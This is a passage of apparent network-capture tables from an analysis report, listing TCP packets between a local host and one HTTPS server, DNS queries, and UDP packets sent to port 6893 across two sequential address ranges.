Sep 29, 2022 14:51:24.872246981 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.872283936 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.872322083 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.873450041 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.873472929 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.873558998 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.873579025 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.874465942 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.874502897 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.874546051 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.874557972 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.874592066 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.875497103 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.875519037 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.875596046 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.875614882 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.882638931 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.882678986 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.882740974 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.882766962 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.882781982 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.887090921 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.887118101 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.887250900 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.887284040 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.887346983 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.887379885 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.887459993 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.887480021 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.887550116 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.887554884 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.887572050 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.887670040 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.887686014 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.888242960 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.888272047 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.888324976 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.888344049 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.888362885 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.889125109 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.889147043 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.889235973 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.889256954 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.889272928 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.889324903 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.889352083 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.889395952 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.889408112 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.889441013 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.890077114 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.890103102 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.890125990 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.890186071 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.890199900 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.890214920 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.890646935 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.890907049 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.890932083 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.891012907 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.891026020 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.891184092 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.891207933 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.891290903 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.891303062 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.891328096 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.891925097 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.891969919 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.891994953 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.892055988 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.892071962 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.892082930 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.892147064 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.892163992 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.892568111 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.892790079 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.892870903 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.892905951 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.892959118 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.892967939 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.892999887 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.893018961 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.893277884 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.893300056 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.893366098 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.893378019 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.893450022 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.893476963 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.893512011 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.893512011 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.893526077 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.893543959 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.893583059 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.893743038 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.894366980 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.894398928 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.894423008 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.894475937 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.894486904 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.894517899 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.894542933 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.894891977 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.895109892 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.897876978 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.897907972 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.898037910 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.898061991 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.898158073 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.902456045 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.902482986 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.902627945 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.902658939 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.902717113 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.902774096 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.902796984 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.902848959 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.902865887 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.902909994 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.902925968 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.903160095 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.903215885 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.903247118 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.903261900 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.903276920 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.903304100 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.903482914 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.903534889 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.903558016 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.903569937 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.903614044 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.903637886 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.903685093 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.903707027 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.903755903 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.903765917 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.903810024 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.903826952 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.903878927 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.903899908 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.903944969 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.903955936 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.903983116 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.903999090 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.904597044 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.904622078 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.904670954 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.904683113 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.904710054 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.904721975 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.905086040 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.905101061 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.905181885 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.905194998 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.905246019 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.905291080 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.905309916 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.905359983 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.905369997 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.905405998 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.905424118 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.905494928 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.905514956 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.905576944 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.905591011 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.905613899 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.905637026 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.906040907 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.906130075 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.906146049 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.906203985 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.906296968 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.906317949 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.906366110 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.906378984 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.906397104 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.906419992 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.906711102 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.906728983 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.906810045 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.906826973 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.906928062 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.906946898 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.907046080 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.907046080 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.907067060 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.907128096 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.907155037 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.907201052 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.907215118 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.907237053 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.907274961 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.907701969 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.907722950 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.907831907 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.907856941 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.907919884 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.907919884 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.908001900 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.908037901 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.908097982 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.908224106 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.908272982 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.908272982 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.908416986 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.908453941 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.908476114 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.908476114 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.908482075 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.908513069 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.908525944 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.908621073 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.908886909 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.908921003 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.908971071 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.908998966 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.909023046 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.909152031 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.909248114 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.909267902 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.909327984 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.909348965 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.909372091 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.909442902 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.909485102 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.909497976 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.909522057 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.909537077 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.909562111 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.909648895 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.909668922 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.909729004 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.909753084 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.909770966 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.910043001 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.910068035 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.910125017 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.910145044 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.910168886 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.910245895 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.910264015 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.910322905 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.910348892 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.910371065 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.910469055 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.910494089 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.910543919 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.910563946 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.910605907 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.910608053 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.910770893 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.910794973 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.910825968 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.910861969 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.910897970 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.910933971 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.910933971 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.910962105 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.911156893 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.911237001 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.911246061 CEST	443	49760	185.199.108.133	192.168.2.6
Sep 29, 2022 14:51:24.911612988 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.911633015 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.912019968 CEST	49760	443	192.168.2.6	185.199.108.133
Sep 29, 2022 14:51:24.918112040 CEST	49760	443	192.168.2.6	185.199.108.133

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 29, 2022 14:49:48.360481024 CEST	49448	53	192.168.2.6	8.8.8.8
Sep 29, 2022 14:49:48.382462978 CEST	53	49448	8.8.8.8	192.168.2.6
Sep 29, 2022 14:49:48.983381987 CEST	59082	53	192.168.2.6	8.8.8.8
Sep 29, 2022 14:49:49.000629902 CEST	53	59082	8.8.8.8	192.168.2.6
Sep 29, 2022 14:50:24.513544083 CEST	59083	6893	192.168.2.6	93.107.12.0
Sep 29, 2022 14:50:24.517466068 CEST	59083	6893	192.168.2.6	93.107.12.1
Sep 29, 2022 14:50:24.517626047 CEST	59083	6893	192.168.2.6	93.107.12.2
Sep 29, 2022 14:50:24.517678022 CEST	59083	6893	192.168.2.6	93.107.12.3
Sep 29, 2022 14:50:24.517801046 CEST	59083	6893	192.168.2.6	93.107.12.4
Sep 29, 2022 14:50:24.517890930 CEST	59083	6893	192.168.2.6	93.107.12.5
Sep 29, 2022 14:50:24.522114038 CEST	59083	6893	192.168.2.6	93.107.12.6
Sep 29, 2022 14:50:24.522224903 CEST	59083	6893	192.168.2.6	93.107.12.7
Sep 29, 2022 14:50:24.522295952 CEST	59083	6893	192.168.2.6	93.107.12.8
Sep 29, 2022 14:50:24.522375107 CEST	59083	6893	192.168.2.6	93.107.12.9
Sep 29, 2022 14:50:24.522511005 CEST	59083	6893	192.168.2.6	93.107.12.10
Sep 29, 2022 14:50:24.522604942 CEST	59083	6893	192.168.2.6	93.107.12.11
Sep 29, 2022 14:50:24.522686958 CEST	59083	6893	192.168.2.6	93.107.12.12
Sep 29, 2022 14:50:24.522787094 CEST	59083	6893	192.168.2.6	93.107.12.13
Sep 29, 2022 14:50:24.522890091 CEST	59083	6893	192.168.2.6	93.107.12.14
Sep 29, 2022 14:50:24.522984028 CEST	59083	6893	192.168.2.6	93.107.12.15
Sep 29, 2022 14:50:24.523087025 CEST	59083	6893	192.168.2.6	93.107.12.16
Sep 29, 2022 14:50:24.523194075 CEST	59083	6893	192.168.2.6	93.107.12.17
Sep 29, 2022 14:50:24.523288012 CEST	59083	6893	192.168.2.6	93.107.12.18
Sep 29, 2022 14:50:24.523439884 CEST	59083	6893	192.168.2.6	93.107.12.19
Sep 29, 2022 14:50:24.523499012 CEST	59083	6893	192.168.2.6	93.107.12.20
Sep 29, 2022 14:50:24.523567915 CEST	59083	6893	192.168.2.6	93.107.12.21
Sep 29, 2022 14:50:24.523655891 CEST	59083	6893	192.168.2.6	93.107.12.22
Sep 29, 2022 14:50:24.523745060 CEST	59083	6893	192.168.2.6	93.107.12.23
Sep 29, 2022 14:50:24.523832083 CEST	59083	6893	192.168.2.6	93.107.12.24
Sep 29, 2022 14:50:24.523948908 CEST	59083	6893	192.168.2.6	93.107.12.25
Sep 29, 2022 14:50:24.524035931 CEST	59083	6893	192.168.2.6	93.107.12.26
Sep 29, 2022 14:50:24.524179935 CEST	59083	6893	192.168.2.6	93.107.12.27
Sep 29, 2022 14:50:24.524256945 CEST	59083	6893	192.168.2.6	93.107.12.28
Sep 29, 2022 14:50:24.533560038 CEST	59083	6893	192.168.2.6	93.107.12.29
Sep 29, 2022 14:50:24.533772945 CEST	59083	6893	192.168.2.6	93.107.12.30
Sep 29, 2022 14:50:24.533900023 CEST	59083	6893	192.168.2.6	93.107.12.31
Sep 29, 2022 14:50:24.534142971 CEST	59083	6893	192.168.2.6	95.1.200.0
Sep 29, 2022 14:50:24.534275055 CEST	59083	6893	192.168.2.6	95.1.200.1
Sep 29, 2022 14:50:24.534351110 CEST	59083	6893	192.168.2.6	95.1.200.2
Sep 29, 2022 14:50:24.534447908 CEST	59083	6893	192.168.2.6	95.1.200.3
Sep 29, 2022 14:50:24.534543991 CEST	59083	6893	192.168.2.6	95.1.200.4
Sep 29, 2022 14:50:24.536127090 CEST	59083	6893	192.168.2.6	95.1.200.5
Sep 29, 2022 14:50:24.536408901 CEST	59083	6893	192.168.2.6	95.1.200.6
Sep 29, 2022 14:50:24.536484003 CEST	59083	6893	192.168.2.6	95.1.200.7
Sep 29, 2022 14:50:24.536626101 CEST	59083	6893	192.168.2.6	95.1.200.8
Sep 29, 2022 14:50:24.536815882 CEST	59083	6893	192.168.2.6	95.1.200.10
Sep 29, 2022 14:50:24.536926985 CEST	59083	6893	192.168.2.6	95.1.200.11
Sep 29, 2022 14:50:24.537031889 CEST	59083	6893	192.168.2.6	95.1.200.12
Sep 29, 2022 14:50:24.537166119 CEST	59083	6893	192.168.2.6	95.1.200.13
Sep 29, 2022 14:50:24.537259102 CEST	59083	6893	192.168.2.6	95.1.200.14
Sep 29, 2022 14:50:24.537261009 CEST	59083	6893	192.168.2.6	95.1.200.9
Sep 29, 2022 14:50:24.537348032 CEST	59083	6893	192.168.2.6	95.1.200.15
Sep 29, 2022 14:50:24.537529945 CEST	59083	6893	192.168.2.6	95.1.200.16
Sep 29, 2022 14:50:24.537631035 CEST	59083	6893	192.168.2.6	95.1.200.17
Sep 29, 2022 14:50:24.537723064 CEST	59083	6893	192.168.2.6	95.1.200.18
Sep 29, 2022 14:50:24.537820101 CEST	59083	6893	192.168.2.6	95.1.200.19
Sep 29, 2022 14:50:24.537911892 CEST	59083	6893	192.168.2.6	95.1.200.20
Sep 29, 2022 14:50:24.538068056 CEST	59083	6893	192.168.2.6	95.1.200.21
Sep 29, 2022 14:50:24.538165092 CEST	59083	6893	192.168.2.6	95.1.200.22
Sep 29, 2022 14:50:24.538351059 CEST	59083	6893	192.168.2.6	95.1.200.23
Sep 29, 2022 14:50:24.538351059 CEST	59083	6893	192.168.2.6	95.1.200.24
Sep 29, 2022 14:50:24.538440943 CEST	59083	6893	192.168.2.6	95.1.200.25
Sep 29, 2022 14:50:24.538538933 CEST	59083	6893	192.168.2.6	95.1.200.26
Sep 29, 2022 14:50:24.538646936 CEST	59083	6893	192.168.2.6	95.1.200.27
Sep 29, 2022 14:50:24.538748980 CEST	59083	6893	192.168.2.6	95.1.200.28
Sep 29, 2022 14:50:24.538845062 CEST	59083	6893	192.168.2.6	95.1.200.29
Sep 29, 2022 14:50:24.539043903 CEST	59083	6893	192.168.2.6	95.1.200.30
Sep 29, 2022 14:50:24.539163113 CEST	59083	6893	192.168.2.6	95.1.200.31
